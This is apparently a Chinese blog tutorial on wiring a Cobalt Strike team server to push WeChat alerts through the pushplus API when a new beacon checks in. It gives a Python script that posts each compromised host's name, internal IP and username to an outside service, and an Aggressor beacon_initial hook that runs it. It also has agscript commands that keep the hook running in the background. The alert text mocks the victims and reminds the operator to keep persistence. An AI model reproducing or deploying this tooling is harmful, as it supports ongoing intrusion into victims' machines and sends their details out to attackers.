CobaltStrike上线微信通知

利用pushplus公众号（每天免费发送200条消息）

http://www.pushplus.plus/push1.html

扫码登录后需要复制token

可以测试一下发送一下消息，手机会受到如下消息。可以在微信提示里将消息免打扰关闭（默认是开启的）

利用该api接口在上线后进行请求，参考了github上大佬的代码。但接口变了用不了只能自己改一下，改好的代码如下

# encoding:utf-8
import argparse
import requests
import random
import string
import jsontoken = 'xxxxxx' #在 http://www.pushplus.plus/push1.html 复制parser = argparse.ArgumentParser(description='Beacon Info')
parser.add_argument('--computername')
parser.add_argument('--internalip')
parser.add_argument('--username')
args = parser.parse_args()internalip = args.internalip
computername = args.computername
username = args.username
ran_str = ''.join(random.sample(string.ascii_letters + string.digits, 8))title = "TPAER专用CS主机上线提醒"
content = """**主人又有笨蛋上线了~****主机名: {}****IP: {}****用户名: {}****Token: {}****注意权限维持**
""".format(internalip, computername, username, ran_str)url = 'http://www.pushplus.plus/api/send'
data = {"token":token,"title":title,"content":content,"template":"markdown","channel":"wechat"
}
body=json.dumps(data).encode(encoding='utf-8')
headers = {'Content-Type':'application/json'}
requests.post(url,data=body,headers=headers)

可以将token替换，直接运行看微信是否成功收到消息，测试成功后放在服务器某目录下

然后是一个.cna文件，里面需要修改的cmd命令中的地址

on beacon_initial {println("Initial Beacon Checkin: " . $1 . " PID: " . beacon_info($1,"pid"));local('$internalIP $computerName $userName');$internalIP = replace(beacon_info($1,"internal")," ","_");$computerName = replace(beacon_info($1,"computer")," ","_");$userName = replace(beacon_info($1,"user")," ","_");$cmd = 'python3 /root/ATK/CSonWeChat/PushPlus.py' . " --computernam " . $computerName . " --internalip " . $internalIP . " --username " . $userName;println("Sending server: " . $cmd);exec($cmd);
}

在准备完成后进入cs的目录下，可以使用screen也可以nohup命令后台挂载

我这里直接使用screen，然后执行如下命令

./agscript Cobalt_Strikeip 端口 用户 密码 /目录/PushPlus.cna > /目录/PushPlus.log 2>&1 &

查看进程，成功跑起

ps -aux | grep agscript

在CS有主机上线后，微信成功收到了发来的提示信息